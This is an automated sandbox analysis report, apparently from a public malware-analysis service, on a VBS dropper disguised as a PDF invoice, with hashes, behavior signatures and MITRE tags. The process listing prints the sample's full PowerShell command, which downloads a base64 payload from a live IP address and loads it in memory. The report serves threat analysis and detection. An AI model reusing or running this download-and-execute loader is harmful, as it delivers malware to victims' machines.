1add10f411596ce592775736cbd547b0de4e69ae044173cb604bc1cb410dc424

Analysis

max time kernel
41s
max time network
44s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
08-10-2022 08:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
Size

442KB
MD5

62174dd3cc316dff4896b292cde3eebc
SHA1

abc441c9636e64ff3c6a24879efc6c847640adfa
SHA256

1add10f411596ce592775736cbd547b0de4e69ae044173cb604bc1cb410dc424
SHA512

ec4d0dd87b74e8ae268d9cea674a75920b0935095c975db0f3609af176ee3392801ec9d12ad0705964fd4491bc5b05ac6f089b7b34690a64923b5fb5c098e7f3
SSDEEP

768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0O0gAOAqAn:7aW1AP4HgK

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1160 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1160 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1160 powershell.exe

flow	pid	process
3	1160	powershell.exe

pid	process
1160	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1160	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1424 wrote to memory of 1160	1424	WScript.exe	powershell.exe
PID 1424 wrote to memory of 1160	1424	WScript.exe	powershell.exe
PID 1424 wrote to memory of 1160	1424	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/9EUiS/d/ee.etsap//:sptth'))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1160

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1160-55-0x0000000000000000-mapping.dmp

Download
memory/1160-57-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp

Filesize
10.1MB

Download
memory/1160-59-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/1160-58-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp

Filesize
11.4MB

Download
memory/1160-60-0x000000000261B000-0x000000000263A000-memory.dmp

Filesize
124KB

Download
memory/1160-61-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/1160-62-0x000000000261B000-0x000000000263A000-memory.dmp

Filesize
124KB

Download
memory/1424-54-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmp

Filesize
8KB

Download